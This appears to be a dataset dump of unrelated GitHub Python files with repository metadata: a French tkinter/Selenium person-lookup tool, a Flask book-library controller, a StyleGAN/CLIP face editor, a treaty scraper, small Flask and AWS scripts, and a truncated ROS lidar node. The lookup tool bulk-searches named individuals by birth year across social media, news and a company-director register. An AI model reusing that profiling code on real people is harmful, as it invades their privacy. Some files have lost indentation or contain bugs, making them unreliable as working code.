for result in data.get('organic_results', []):
url = result['link']
title = result.get('title', '').lower()
if f"{name.lower()} {surname.lower()}" in title:
digital_life_news["Nombre"] += 1 # Mettez à jour la catégorie 'Vie numerique actualites'
digital_life_news["Liens"].append(url)
digital_life_news["Noms"].append(name + " " + surname)
results = {
"Reseaux sociaux": social_info,
"Vie numerique": digital_life,
"Vie numerique actualites": digital_life_news, # Ajoutez cette nouvelle catégorie aux résultats
"Entreprise": company_info
}
return results
def show_results(self, results):
        # Create a new window to display the search results
        results_window = tk.Toplevel(self.root)
        results_window.title("Résultats de la recherche")
        # Create a text widget to display the result counts
        results_text = tk.Text(results_window)
        results_text.pack()
        # Insert the result counts into the text widget
        for key, value in results.items():
            results_text.insert(tk.END, f"{key}: {value['Nombre']}\n")
            detail_button = tk.Button(results_window, text=f"Voir détails de {key}",
                                      command=lambda value=value, key=key: self.show_details(value, key))
            detail_button.pack()
        results_window.geometry("300x200")  # Adjust the window size
    def show_details(self, value, category):
        # Create a new window to display the details
details_window = tk.Toplevel(self.root)
details_window.title(f"Détails de {category}")
if 'Liens' in value:
links_label = tk.Label(details_window, text=f"Liens:")
links_label.pack()
links_text = tk.Text(details_window)
links_text.pack()
for link in value['Liens']:
links_text.insert(tk.END, f"{link}\n")
if 'Noms' in value:
names_label = tk.Label(details_window, text=f"Noms:")
names_label.pack()
names_text = tk.Text(details_window)
names_text.pack()
for name in value['Noms']:
names_text.insert(tk.END, f"{name}\n")
width = 600
height = 100 + len(value.get('Liens', [])) * 20 + len(value.get('Noms', [])) * 20
height = min(height, 800)
details_window.geometry(f"{width}x{height}") # Définir la taille de la fenêtre
def show_simple_search(self):
self.hide_all()
self.simple_search_interface.pack()
def show_identity_search(self):
self.hide_all()
self.identity_search_interface.pack()
def hide_all(self):
self.simple_search_interface.pack_forget()
self.identity_search_interface.pack_forget()
def toggle_birth_year(self):
if self.birth_year_label.winfo_ismapped():
self.birth_year_label.pack_forget()
self.birth_year_entry.pack_forget()
else:
self.birth_year_label.pack()
self.birth_year_entry.pack()
def upload_file(self):
self.filename = filedialog.askopenfilename(initialdir = "/", title = "Sélectionner un fichier", filetypes = (("Excel files", "*.xlsx"), ("all files", "*.*")))
if self.filename:
self.df = pd.read_excel(self.filename)
self.current_row = 0
self.start_button['state'] = tk.NORMAL
def start_search(self):
if self.df is not None:
            self.progress['maximum'] = len(self.df)  # configure the maximum of the progress bar
while self.current_row < len(self.df):
self.driver.get("https://dirigeant.societe.com/pages/recherchedir.html")
WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, "entrepdirig")))
self.driver.find_element(By.ID, "entrepdirig").send_keys(self.df.iloc[self.current_row]["nom"]) # 'nom'
WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, "entreppre")))
self.driver.find_element(By.ID, "entreppre").send_keys(self.df.iloc[self.current_row]["prenom"]) # 'prenom'
                # Fill in the birth year
                WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.ID, "entrepann")))  # "entrepann" is the ID of the birth-year input field
                self.driver.find_element(By.ID, "entrepann").send_keys(self.df.iloc[self.current_row]["date_naissance"])  # 'date_naissance'
                self.driver.find_element(By.XPATH, "//a[contains(text(), 'Rechercher les dirigeants')]").click()
                # Wait for the results to load
try:
WebDriverWait(self.driver, 1).until(EC.presence_of_element_located((By.CLASS_NAME, "bloc-print")))
except TimeoutException:
print("Temps d'attente dépassé en attendant le chargement des résultats. Passage à la recherche suivante.")
try:
num_results_element = self.driver.find_element(By.CSS_SELECTOR, ".nombre.numdisplay")
num_results = int(num_results_element.text)
except NoSuchElementException:
num_results = 0
                # Update the DataFrame
                self.df.at[self.current_row, "nombre de sociétés"] = num_results  # 'nombre de sociétés'
                # Update the progress bar
                self.progress['value'] = self.current_row
                self.progress.update()
                # Move on to the next search
                self.current_row += 1
            # Save the results to the Excel file once all searches are finished
            self.update_excel()
            # Reset the progress bar after the search
            self.progress['value'] = 0
            self.progress.update()
            # Show a pop-up telling the user that all searches are finished
messagebox.showinfo("Information", "Toutes les recherches sont terminées.")
else:
messagebox.showinfo("Information", "Veuillez d'abord uploader un fichier Excel.")
def update_excel(self):
if self.df is not None:
self.df.to_excel("Resultats.xlsx", index=False)
messagebox.showinfo("Information", "Fichier Excel mis à jour.")
root = tk.Tk()
app = App(root)
root.mainloop()
|
Boo4S/AISearch
|
main.py
|
main.py
|
py
| 15,301 |
python
|
fr
|
code
| 0 |
github-code
|
6
|
16551902324
|
import string, random, json, sys, os.path, uuid
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
# from models import sesion
# import models.models as database
from sqlalchemy.exc import IntegrityError
from sqlalchemy.sql.functions import func
from sqlalchemy import desc
import uuid
from config.config import env
from werkzeug.utils import secure_filename
from flask import flash, redirect, url_for, jsonify, render_template,send_from_directory, request
from ml_algos import PdfHandler, CommentHandler, CsvHandler
from models import tables
import datetime
import numpy as np
## Check that only one (allowed) extension is present
def allowed_file(file, type):
if type == 'img' and file == None:
return True
return '.' in file.filename and \
file.filename.rsplit('.', 1)[1].lower() in (env['ALLOWED_EXTENSIONS_BOOKS'] if type == 'book' else env['ALLOWED_EXTENSIONS_IMG'])
def id_generator(size=150, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def get_count(q):
count_q = q.statement.with_only_columns([func.count()]).order_by(None)
count = q.session.execute(count_q).scalar()
return count
class LibrosCtrl(object):
@staticmethod
def all(page_num):
try:
res = {
'success': False,
}
total = tables.Libro.query.filter(tables.Libro.li_activo == True)
books = tables.Libro.activeBooks(page_num)
if books == None:
res['books'] = []
else:
# print(books.comentarios)
serialized = [ { 'id': i.li_id,
'name': i.li_titulo,
'file': i.li_archivo,
# 'likes': i.likes,
'licencia': i.li_licencia,
'autor': tables.Libro.getAuthor(i.li_id),
'image': i.li_imagen } for i in books ]
res['books'] = serialized
res['success'] = True
res['total'] = get_count(total)
except Exception as e:
print(e)
# db.session.rollback()
            res['msg'] = 'Hubo un error al obtener los libros, inténtelo nuevamente'
finally:
resp = jsonify(res)
return resp, 200
@staticmethod
def getBook(book_id):
try:
res = {
'success': False,
}
book = tables.Libro.exists(book_id)
if not book:
return render_template('errors/404.html'), 404
# book = tables.Libro.get_book(book_id)
book.update_num_views()
book_body = {
'id': book.li_id,
'keywords': [
{
'text': word.pc_palabra,
'weight': word.pc_ocurrencia
} for word in book.palabras_clave
],
'title': book.li_titulo,
'image': book.li_imagen,
'downloads': book.li_num_descargas,
'file': book.li_archivo,
'language': book.li_idioma,
'created_at': datetime.datetime.strftime(book.li_fecha_creacion, '%Y-%m-%d'),
'comments': [
{
'text': comment.cm_texto,
'date': comment.cm_fecha_creacion,
'autor': comment.autor.usuario.complete_name(),
'username': comment.autor.usuario.us_nombre_usuario,
'autor_id': comment.autor.ai_id,
} for comment in book.comentarios
],
'genre': [
{
'id': word.ge_id,
'desc': word.ge_descripcion,
} for word in book.generos
],
}
res['success'] = True
res['book'] = book_body
resp = jsonify(res)
return resp, 200
except Exception as e:
print(e)
# db.session.rollback()
res['msg'] = 'Hubo un error al cargar el Libro, inténtelo nuevamente'
resp = jsonify(res)
return resp, 500
@staticmethod
def getBookStatistics(book_id):
try:
res = {
'success': False,
}
book = tables.Libro.exists(book_id)
if not book:
return render_template('errors/404.html'), 404
# book = tables.Libro.get_book(book_id)
book_body = {
'id': book.li_id,
'keywords': [
{
'text': word.pc_palabra,
'weight': word.pc_ocurrencia
} for word in book.palabras_clave
],
'comments': [
{
'text': comment.cm_texto,
'date': comment.cm_fecha_creacion,
'autor': comment.autor.usuario.complete_name(),
'username': comment.autor.usuario.us_nombre_usuario,
'autor_id': comment.autor.ai_id,
} for comment in book.comentarios
],
'title': book.li_titulo,
'image': book.li_imagen,
'downloads': book.li_num_descargas,
'views': book.li_numero_vistas,
'file': book.li_archivo,
'language': book.li_idioma,
'genre': [
{
'id': word.ge_id,
'desc': word.ge_descripcion,
} for word in book.generos
],
}
commentTf = CommentHandler.CommentHandler('es', book_body['comments'])
res['success'] = True
res['book'] = book_body
res['comment_wc'] = [{'text': word[0], 'weight': word[1]} for word in commentTf.get_word_cloud(0.5)]
resp = jsonify(res)
return resp, 200
except Exception as e:
print(e)
# db.session.rollback()
res['msg'] = 'Hubo un error al cargar el Libro, inténtelo nuevamente'
resp = jsonify(res)
return resp, 500
@staticmethod
def getBooksStatistics(autor_id):
try:
res = {
'success': False,
}
autor = tables.AutorIndie.exists(autor_id)
if not autor:
return render_template('errors/404.html'), 404
books = autor.publicacion
report_body = [
{
'id': book.li_id,
'title': book.li_titulo,
'image': book.li_imagen,
'downloads': book.li_num_descargas,
'views': book.li_numero_vistas,
'likes': int(np.sum([ like.lk_puntaje for like in book.likes ]))
}
for book in books
]
keywords = []
for book in books:
_keywords = [ {'text': keyword.pc_palabra, 'weight': keyword.pc_ocurrencia } for keyword in book.palabras_clave ]
keywords.extend(_keywords)
res['word_cloud_keywords'] = keywords
res['success'] = True
res['books'] = report_body
resp = jsonify(res)
return resp, 200
except Exception as e:
print(e)
# db.session.rollback()
res['msg'] = 'Hubo un error al cargar el Libro, inténtelo nuevamente'
resp = jsonify(res)
return resp, 500
@staticmethod
def searchBook(query_p, db, response):
try:
res = {
'success': False,
}
            # NOTE (editor): the original filter referenced attribute names mangled by a bulk
            # rename (e.g. "tables.Libro.nombre_tables.Libro"); the columns below follow the
            # li_* schema used by the rest of this controller. The author filter and the
            # 'likes' field are dropped here because, in this schema, both are relationships
            # rather than plain columns (see all() above).
            books = tables.Libro.query.filter(
                tables.Libro.li_titulo.like('%{}%'.format(query_p)),
                tables.Libro.li_activo == True
            ).all()
            if books == None:
                res['books'] = []
            else:
                # print(books.comentarios)
                serialized = [ { 'id': i.li_id,
                                 'name': i.li_titulo,
                                 'file': i.li_archivo,
                                 'autor': tables.Libro.getAuthor(i.li_id),
                                 'licencia': i.li_licencia,
                                 'image': i.li_imagen } for i in books ]
res['books'] = serialized
res['success'] = True
except Exception as e:
print(e)
# db.session.rollback()
            res['msg'] = 'Hubo un error al cargar el libro, inténtelo nuevamente'
finally:
return response(json.dumps(res), mimetype='application/json')
@staticmethod
def denounceBook(book_id):
try:
res = {
'success': False,
}
req = request.get_json()
print(req)
denounce = tables.Denuncias(
de_descripcion=req['desc'],
autor_id=req['autor_id'],
libro_id=book_id
)
print(denounce)
denounce.save()
res['success'] = True
res['msg'] = 'El libro acaba de ser denunciado, revisaremos su solicitud para tomar las acciones pertinentes, gracias'
return jsonify(res), 200
except Exception as e:
print(e)
res['msg'] = 'Hubo un error al procesar su solicitud, inténtelo nuevamente'
return jsonify(res), 500
@staticmethod
def rateBook(book_id):
try:
res = {
'success': False,
}
req = request.get_json()
rate = tables.Like.exists(req['autor_id'], book_id)
if not rate:
like = tables.Like(
autor_id=req['autor_id'],
libro_id=book_id,
lk_puntaje=req['rating']
)
like.save()
else:
rate.lk_puntaje = req['rating']
rate.save()
res['success'] = True
res['msg'] = 'Se agrego su puntuación'
return jsonify(res), 200
except Exception as e:
print(e)
res['msg'] = 'Hubo un error al agregar su puntuacion'
return jsonify(res), 500
@staticmethod
def getRating(book_id, autor_id):
try:
res = {
'success': False,
}
rate = tables.Like.exists(autor_id, book_id)
res['rating'] = rate.lk_puntaje if rate else 0
res['success'] = True
res['msg'] = 'Se agrego su puntuación'
return jsonify(res), 200
except Exception as e:
print(e)
res['msg'] = 'Hubo un error al agregar su puntuacion'
return jsonify(res), 500
@staticmethod
def uploadBook(db, request, response):
try:
res = {
'success': False,
}
if request.method == 'POST':
if 'filebook' not in request.files:
res['success'] = False
res['msg'] = 'Debe seleccionar un archivo del escrito'
res['code'] = 400
bookfile = request.files['filebook']
imgfile = request.files['fileimg'] if 'fileimg' in request.files else None
if bookfile.filename == '':
res['success'] = False
res['msg'] = 'Debe seleccionar un archivo del escrito'
res['code'] = 400
if (bookfile and allowed_file(bookfile, 'book')) and (imgfile or allowed_file(imgfile, 'img')):
bookfilename = uuid.uuid4().hex + secure_filename(bookfile.filename)
imgfilename = uuid.uuid4().hex + secure_filename(imgfile.filename) if imgfile else None
autor = tables.AutorIndie.exists(request.form['autor_id'])
newBook = tables.Libro(
li_titulo=request.form['book'],
li_idioma=request.form['language'],
li_licencia=request.form['licence'],
li_archivo=bookfilename,
li_imagen=imgfilename,
)
autor.publicacion.append(newBook)
tables.AutorIndie.save(autor)
# db.session.add(autor)
genero = tables.Genero(ge_descripcion = request.form['genre'])
newBook.generos.append(genero)
path_book = os.path.join(env['UPLOADS_DIR'] + '/books', bookfilename)
bookfile.save(path_book)
pdfHandler = PdfHandler.PdfHandler(request.form['language'], path_book)
# pdfHandler = PdfHandler(request.form['language'])
word_cloud, df = pdfHandler.get_word_cloud(0.15)
# csv = CsvHandler.CsvHandler(bookfilename.replace('.pdf', '.csv'))
# newBook.li_keywords_csv = csv_file
newBook.saveKeyWords(word_cloud)
# tables.Libro.save(newBook)
newBook.save()
if imgfilename != None: imgfile.save(os.path.join(env['UPLOADS_DIR'] + '/images', imgfilename))
res['success'] = True
res['route'] = 'libro-exito'
res['book_id'] = newBook.li_id
else:
print('err')
res['success'] = False
res['msg'] = 'Formato no aceptado'
res['code'] = 400
resp = jsonify(res)
return resp, 200
except Exception as e:
db.session.rollback()
res['route'] = 'libro-error'
resp = jsonify(res)
return resp, 500
@staticmethod
def downloadBook(book_id):
res = { 'success': False }
try:
book = tables.Libro.exists(book_id)
if not book:
return render_template('errors/404.html'), 404
book.update_num_downloads()
res['success'] = True
res['downloads_counter'] = book.li_num_descargas
return jsonify(res), 200
except Exception as e:
print(e)
res['msg'] = 'Hubo un error al actualizar el contador de descargas'
return jsonify(res), 200
@staticmethod
def commentBook():
res = { 'success': False }
try:
req = request.get_json()
book = tables.Libro.exists(req['book_id'])
if not book:
return render_template('errors/404.html'), 404
comment = tables.Comentario(
libro_id=req['book_id'],
autor_id=req['autor_id'],
cm_texto=req['text'],
)
book.comentarios.append(comment)
book.save()
res['success'] = True
res['comment'] = {
'text': comment.cm_texto,
'date': comment.cm_fecha_creacion,
'autor': comment.autor.usuario.complete_name(),
'username': comment.autor.usuario.us_nombre_usuario,
'autor_id': comment.autor.ai_id,
}
# res['downloads_counter'] = book.li_num_descargas
return jsonify(res), 200
except Exception as e:
print(e)
            res['msg'] = 'Hubo un error al agregar el comentario'
return jsonify(res), 200
|
pabloIO/LIBREria_bo
|
controllers/libros_ctrl.py
|
libros_ctrl.py
|
py
| 16,176 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37511806658
|
from invimg.scripts.inference import invert
import math
import os
import torch
import torchvision
from tqdm import tqdm
import numpy as np
from optimclip.criteria.clip_loss import CLIPLoss
from optimclip.criteria.id_loss import IDLoss
from optimclip.models.stylegan2.model import Generator
import clip
from faceparsing.test import evaluate
from PIL import Image
from torchvision import transforms
from run_config.config import Options
STYLESPACE_DIMENSIONS = [512 for _ in range(15)] + [256, 256, 256] + [128, 128, 128] + [64, 64, 64] + [32, 32]
# invert()
STYLESPACE_INDICES_WITHOUT_TORGB = [i for i in range(len(STYLESPACE_DIMENSIONS)) if i not in list(range(1, len(STYLESPACE_DIMENSIONS), 3))]
def get_ganmodel(opts):
generator = Generator(opts.size, 512, 8, channel_multiplier=2)
    # TODO: inspect the Generator architecture/weights here
model = torch.load(opts.gan_model)['g_ema']
generator.load_state_dict(model, strict=True)
generator = generator.eval().cuda()
return generator
def get_lr(t, initial_lr, rampdown=0.25, rampup=0.05):
lr_ramp = min(1, (1 - t) / rampdown)
lr_ramp = 0.5 - 0.5 * math.cos(lr_ramp * math.pi)
lr_ramp = lr_ramp * min(1, t / rampup)
return initial_lr * lr_ramp
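# --- editor's note (hedged): get_lr implements the usual latent-optimisation schedule --
# the learning rate ramps up linearly over the first `rampup` fraction of the steps,
# stays at initial_lr in the middle, and decays with a half-cosine over the last
# `rampdown` fraction. With the defaults, get_lr(0.0, 0.1) == 0.0,
# get_lr(0.5, 0.1) == 0.1 and get_lr(1.0, 0.1) == 0.0.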
def get_init_latent(orig_pic):
latent_path = 'result/inv/latents.npy'
try:
latents = np.load(latent_path, allow_pickle=True).item()
latent_code = np.expand_dims(np.array(latents[orig_pic]), axis=0)
except FileNotFoundError:
        invert()  # no latent code cached for this image yet, so run the GAN inversion again
latents = np.load(latent_path, allow_pickle=True).item()
latent_code = np.expand_dims(np.array(latents[orig_pic]), axis=0)
latent_code_init = torch.tensor(latent_code).cuda()
deltas_path = 'result/inv/weight_deltas/' + orig_pic.split('.')[0] + '.npy'
deltas = np.load(deltas_path, allow_pickle=True)
deltas = [torch.from_numpy(w).cuda() if w is not None else None for w in deltas]
return latent_code_init, deltas
def get_imgloss(region, orig_img, img_gen, mask):
img_loss_sum = torch.sum(torch.square(orig_img - img_gen))
img_loss = 0
if region:
if 'bbox' in region:
bbox = region['bbox']
            # index the (N, C, H, W) difference tensor on its spatial dims; the original chained
            # [:][:][...] slicing only ever re-sliced the batch dimension
            crop_area = (orig_img - img_gen)[:, :, bbox[0]:bbox[1], bbox[2]:bbox[3]]
            img_loss = img_loss_sum - torch.sum(torch.square(crop_area))
            area = opts.size ** 2 - abs(bbox[0] - bbox[1]) * abs(bbox[2] - bbox[3])  # area left outside the bbox
img_loss /= area
elif 'organ' in region:
# print(mask.shape)
img_loss = torch.sum(torch.square(orig_img * mask - img_gen * mask))
            area = mask.norm(1)  # for a 0/1 mask the L1 norm equals the number of ones
img_loss /= area
else:
print('region输入错误')
else:
img_loss = img_loss_sum / (opts.size ** 2)
return img_loss
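# --- editor's note (hedged): get_imgloss is a masked pixel reconstruction term --
# squared pixel differences are accumulated outside the bbox (for 'bbox' regions) or
# inside the parsed-face mask (for 'organ' regions), then normalised by the number of
# pixels involved, so the penalty scale is comparable across region sizes.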
def optim(text, input_img, opts, region):
    # tokenize the text prompt and concatenate
edit_text = torch.cat([clip.tokenize(text)]).cuda()
orig_img = Image.open(input_img)
convert = transforms.ToTensor()
normalize = transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
orig_img = normalize(convert(orig_img))
orig_img = orig_img.unsqueeze(0).cuda()
orig_pic = str(input_img).split('/')[-1]
latent_code_init, deltas = get_init_latent(orig_pic)
os.makedirs(opts.results, exist_ok=True)
gan_generator = get_ganmodel(opts)
with torch.no_grad():
latent_code_init = gan_generator([latent_code_init], input_is_latent=True, return_latents=True)
    # generate the initial (inverted) image
with torch.no_grad():
inv_img, _ = gan_generator([latent_code_init], input_is_latent=True,input_is_stylespace=True, randomize_noise=True,
)
latent = [s.detach().clone() for s in latent_code_init]
for c, s in enumerate(latent):
if c in STYLESPACE_INDICES_WITHOUT_TORGB:
s.requires_grad = True
latent = latent_code_init.clone().detach()
latent.requires_grad = True
clip_loss = CLIPLoss(opts)
id_loss = IDLoss(opts)
optimizer = torch.optim.Adam(latent, lr=opts.alpha)
    # build the mask for the region of interest
mask = None
if region and 'organ' in region:
evaluate(region['organ'], 'result/faceparsing/', dspth='input_img/', cp='./faceparsing/res/cp/79999_iter.pth')
mask = Image.open('result/faceparsing/' + orig_pic)
mask = convert(mask).cuda()
mask = mask.repeat(3, 1, 1)
mask = mask.unsqueeze(0)
pbar = tqdm(range(opts.step))
for i in pbar:
t = i / opts.step
lr = get_lr(t, opts.alpha)
optimizer.param_groups[0]["lr"] = lr
img_gen, _ = gan_generator([latent], input_is_latent=True, input_is_stylespace=True, randomize_noise=True)
c_loss = clip_loss(img_gen, edit_text)
if opts.id_lambda > 0:
i_loss = id_loss(img_gen, inv_img)[0]
else:
            i_loss = 0  # skip the ID-loss network when it is not needed, to save time
latent_loss = sum([((latent_code_init[c] - latent[c]) ** 2).sum() for c in range(len(latent_code_init))])
img_loss = get_imgloss(region, orig_img, img_gen, mask)
# print('latent_loss', latent_loss)
# print('img_loss', img_loss)
loss = c_loss + opts.latent_lambda * latent_loss + opts.id_lambda * i_loss + opts.img_lambda * img_loss
optimizer.zero_grad()
loss.backward()
optimizer.step()
pbar.set_description(
(
f"loss: {loss.item():.4f};"
)
)
if opts.save_intermediate_image_every > 0 and i % opts.save_intermediate_image_every == 0:
with torch.no_grad():
img_gen, _ = gan_generator([latent], input_is_latent=True, input_is_stylespace=True, randomize_noise=True)
torchvision.utils.save_image(img_gen, f"result/opt/{str(i).zfill(5)}.jpg", normalize=True, range=(-1, 1))
final_result = torch.cat([orig_img, inv_img, img_gen, mask])
torchvision.utils.save_image(final_result.detach().cpu(), os.path.join(opts.results, "final_result.jpg"),
normalize=True, scale_each=True, range=(-1, 1))
return final_result
if __name__ == '__main__':
opts = Options().get_args()
result = optim(text='blue eyes', input_img='input_img/img1.png', opts=opts, region={'organ': ['hair']})
from torchvision.utils import make_grid
from torchvision.transforms import ToPILImage
result_image = ToPILImage()(
make_grid(result.detach().cpu(), normalize=True, scale_each=True, range=(-1, 1), padding=0))
h, w = result_image.size
result_image.resize((h // 2, w // 2))
import matplotlib.pyplot as plt
plt.imshow(result_image)
plt.show()
|
wangyuchi369/makeup-clip
|
test.py
|
test.py
|
py
| 6,753 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16897266155
|
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.13.8
# kernelspec:
# display_name: Python [conda env:root] *
# language: python
# name: conda-root-py
# ---
import os
import requests
from bs4 import BeautifulSoup
from io import BytesIO
import PyPDF2
import pandas as pd
"""Scrapes UNCTAD website for all international investment agreemets."""
url = "https://investmentpolicy.unctad.org/international-investment-agreements/iia-mapping"
key = "treaty-files/"
soup = BeautifulSoup(requests.get(url).content, "html.parser")
def parse_iia_txt(link):
pdf_bytes = requests.get(link).content
p = BytesIO(pdf_bytes)
try:
read_pdf = PyPDF2.PdfFileReader(p, strict=False)
count = read_pdf.numPages
print(link)
treaty_txt = ''
for page_number in range(count):
page = read_pdf.getPage(page_number)
page_content = page.extractText()
treaty_txt += '\n ' + page_content
return treaty_txt
    except Exception:
        # the PDF could not be parsed; remember the link so it can be inspected or retried later
        bad_links.append(link)
        # return None
        pass
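# --- editor's side note (hedged, not part of the original notebook) ---
# PdfFileReader/extractText belong to the legacy PyPDF2 1.x API. On a newer pypdf /
# PyPDF2 3.x install, an equivalent reader could look like this sketch:
def parse_iia_txt_v3(link):
    from pypdf import PdfReader  # local import so the notebook still runs without pypdf installed
    reader = PdfReader(BytesIO(requests.get(link).content), strict=False)
    return '\n '.join(page.extract_text() or '' for page in reader.pages)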
# +
data = []
bad_links = []
table = soup.find('table', attrs={'class':'table ajax'})
table_body = table.find('tbody')
rows = table_body.find_all('tr')
total = len(rows)
for num, row in enumerate(rows):
print(f"Now on treaty {num} out of {total}.")
row_dict = {'link': None,
'parties': None,
'status': None,
'language': None,
'sign_date': None,
'entry_force_date': None,
'termination_date': None,
'text': None}
for link in row.find_all('a'):
if key in link.get("href", ""):
row_dict['link'] = ("https://investmentpolicy.unctad.org" + link.get("href"))
row_dict['text'] = parse_iia_txt(row_dict['link'])
row_dict['title'] = row.find_all("td", {'data-index' : "2"})[0].text
row_dict['parties'] = row.find_all("td", {'data-index' : "5"})[0].text
row_dict['status'] = row.find_all("td", {'data-index' : "4"})[0].text
row_dict['sign_date'] = row.find_all("td", {'data-index' : "6"})[0].text
row_dict['entry_force_date'] = row.find_all("td", {'data-index' : "7"})[0].text
row_dict['termination_date'] = row.find_all("td", {'data-index' : "8"})[0].text
row_dict['language'] = row.find_all("td", {'data-index' : "9"})[0].text
data.append(row_dict)
# -
treaty_df = pd.DataFrame(data)
treaty_df
treaty_df.to_csv("raw_iia.csv",index=False)
|
amvelazquez/iia-analysis
|
scrape_treaty_db.py
|
scrape_treaty_db.py
|
py
| 2,671 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71404988987
|
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from contextlib import contextmanager
import pathlib
import shutup
# shut those annoying warnings
shutup.please()
# configure selenium
chromedriver_location = f"{next(pathlib.Path('.').glob('**/chromedriver'))}" #dynamically find chromedriver
chrome_options = Options()
chrome_options.add_argument('--headless')
def constructUrl(start):
"""Construct urls from start string."""
constructed_url = list()
for c in start[1:]: # avoid the initial double quote
# append valid url characters
if c.isalnum() or c in ['-','.','_','~',':','/','?','#','[',']','@','!','$','&',"'",'(',')','*','+',',',';','=']:
constructed_url.append(c)
else:
break
return ''.join(constructed_url)
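# Example (editor's note, hedged): constructUrl stops at the first character that is not
# legal in a URL, so
#   constructUrl('"https://example.com/a?b=1 plus trailing text')
# returns 'https://example.com/a?b=1' (the space terminates the scan).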
def extractUrls(driver, extract_from='https://www.google.com/', query='', debug=False):
"""Extract urls from page."""
url_initial = '"https'
se_url = 'search?q='.join([extract_from, query])
driver.get(se_url)
response_html = str(driver.page_source.encode('utf-8')) #assign bytes in string format
url_list = list()
for url in range(response_html.count(url_initial)):
if debug:
print(f'{len(url_list)} urls extracted from {se_url}\r', end='', flush=True)
if url == 0:
url_list.append(constructUrl(start=response_html[response_html.find(url_initial):]))
continue
response_html = response_html.split(url_initial, 1)[1]
url_list.append(constructUrl(start=response_html[response_html.find(url_initial):]))
url_list_no_duplicates = list(dict.fromkeys(url_list))
if debug:
print(f'\nwithout duplicates: {len(url_list_no_duplicates)}', end='')
return url_list_no_duplicates
|
ihiiro/Intelligence
|
intel_engine/url_extractor.py
|
url_extractor.py
|
py
| 1,803 |
python
|
en
|
code
| 0 |
github-code
|
6
|
373981387
|
from app import app
from flask import render_template,flash, request, redirect, url_for
from .forms import CalculatorForm, ButtonForm
from app import db, models
import datetime
@app.route('/')
def index():
greeting = "Hello World!!!"
title = "Homepage"
# return redirect(url_for('create_assessment'))
return render_template('index.html',
title=title,
greeting=greeting)
@app.route('/create_assessment', methods=['GET','POST'])
def create_assessment():
title = "Create Assessment"
header = "Create Assessment"
form = CalculatorForm()
if request.method == 'POST':
if form.validate_on_submit():
p = models.Assessments(title=form.title.data, module_code=form.module_code.data, deadline=form.deadline.data, description=form.description.data)
db.session.add(p)
db.session.commit()
flash('Succesfully submitted data')
return redirect(url_for('create_assessment'))
return render_template('create_assessment.html',
title=title,
header=header,
form=form)
@app.route('/all_assessments')
def all_assessments():
title = "All Assessment"
header = "All Assessments"
form = CalculatorForm()
data = models.Assessments.query.all()
return render_template('all_assessments.html',
title=title,
header=header,
form=form,
data=data)
@app.route('/completed_assessments', methods=['GET', 'POST'])
def completed_assessments():
title = "Completed Assessments"
header = "Completed Assessments"
data = models.Assessments.query.filter_by(status='Completed').all()
form = CalculatorForm()
#check if request method is POST
if request.method == 'POST':
try:
#get the button id & convert it to an integer
id = request.form['button']
id = int(id)
#retrieve the id from the button & update assessment status
p = models.Assessments.query.get(id)
p.status = 'Uncompleted'
db.session.commit()
flash("Assessment Marked As 'Incomplete'")
return redirect(url_for('completed_assessments'))
except:
flash("Unable to mark assessment as 'Incomplete'", "danger")
return redirect(url_for('completed_assessments'))
return render_template('completed_assessments.html',
title=title,
header=header,
form=form,
data=data)
@app.route('/uncompleted_assessments', methods=['GET', 'POST'])
def uncompleted_assessments():
title = "Uncompleted Assessments"
header = "Uncompleted Assessments"
data = models.Assessments.query.filter_by(status='Uncompleted').all()
form = CalculatorForm()
    #check if request method is POST
if request.method == 'POST':
# when a specific button is clicked on, mark as completed & reload the page
try:
#get the button id & convert it to an integer
id = request.form['button']
id = int(id)
#retrieve the id from the button & update assessment status
p = models.Assessments.query.get(id)
p.status = 'Completed'
db.session.commit()
flash("Assessment Marked As 'Complete'")
            #refreshes the page after adding to database
return redirect(url_for('uncompleted_assessments'))
except:
flash("Unable to mark assessment as 'Complete'", "danger")
return redirect(url_for('uncompleted_assessments'))
return render_template('uncompleted_assessments.html',
title=title,
header=header,
form=form,
data=data)
|
Lanrayy/web-app-development-comp2011-cwk1
|
app/views.py
|
views.py
|
py
| 4,045 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10625323914
|
import boto3
access_key = ''
secret_access_key = ''
def get_all_clusters():
ecs_client = boto3.client('ecs', aws_access_key_id=access_key, aws_secret_access_key=secret_access_key)
response = ecs_client.list_clusters()
cluster_arns = response['clusterArns']
return cluster_arns
# print(get_all_regions())
# Get all clusters
clusters = get_all_clusters()
print(clusters)
# Print the clusters
for cluster_arn in clusters:
print(cluster_arn)
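# --- hedged sketch (editor's addition, not in the original script) ---
# list_clusters returns at most 100 ARNs per call; for accounts with more clusters,
# a paginator collects every page. The credential variables are the ones defined above.
def get_all_clusters_paginated():
    ecs_client = boto3.client('ecs', aws_access_key_id=access_key, aws_secret_access_key=secret_access_key)
    arns = []
    for page in ecs_client.get_paginator('list_clusters').paginate():
        arns.extend(page['clusterArns'])
    return arns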
|
PrantaChakraborty/boto3
|
s3/ecs.py
|
ecs.py
|
py
| 462 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16442943983
|
#!/usr/bin/env python
"""
Created on Wed Jan 20 20:53:20 2020
@author: yuweiwu
Usage: this script creates the node lidar_processing
and three topics: closest_point, farthest_point and scan_range
"""
import rospy
#import math
import numpy as np
import std_msgs.msg
from sensor_msgs.msg import LaserScan
from yuweiwu_roslab.msg import scan_range
def lidar_processing():
#initial the node
rospy.init_node("lidar_processing", anonymous = True)
#create topic closest_point
closest_pub = rospy.Publisher('closest_point', std_msgs.msg.Float64, queue_size = 10)
#create topic farthest_point
farthest_pub = rospy.Publisher('farthest_point', std_msgs.msg.Float64, queue_size = 10)
#create topic scan_range
scan = rospy.Publisher('scan_range', scan_range, queue_size = 10)
def callback(msg):
#rate = rospy.Rate(1) # if want to control it
data = scan_range()
data.header = std_msgs.msg.Header(stamp = rospy.Time.now(), frame_id="base")
